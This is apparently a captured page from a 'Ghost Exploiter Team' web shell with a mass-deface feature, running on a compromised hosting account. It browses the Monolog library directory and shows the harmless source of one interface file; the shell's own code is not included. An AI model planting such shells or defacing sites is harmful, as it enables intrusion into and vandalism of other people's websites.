webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
monolog
/
monolog
/
src
/
Monolog
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Attribute
--
ren
Formatter
--
ren
Handler
--
ren
Processor
--
ren
Test
--
ren
DateTimeImmutable.php
1.032KB
edt
ren
ErrorHandler.php
10KB
edt
ren
Level.php
5.352KB
edt
ren
LogRecord.php
3.283KB
edt
ren
Logger.php
22.435KB
edt
ren
Registry.php
3.928KB
edt
ren
ResettableInterface.php
0.951KB
edt
ren
SignalHandler.php
3.803KB
edt
ren
Utils.php
9.17KB
edt
ren
<?php declare(strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; /** * Handler or Processor implementing this interface will be reset when Logger::reset() is called. * * Resetting ends a log cycle gets them back to their initial state. * * Resetting a Handler or a Processor means flushing/cleaning all buffers, resetting internal * state, and getting it back to a state in which it can receive log records again. * * This is useful in case you want to avoid logs leaking between two requests or jobs when you * have a long running process like a worker or an application server serving multiple requests * in one process. * * @author Grégoire Pineau <lyrixx@lyrixx.info> */ interface ResettableInterface { public function reset(): void; }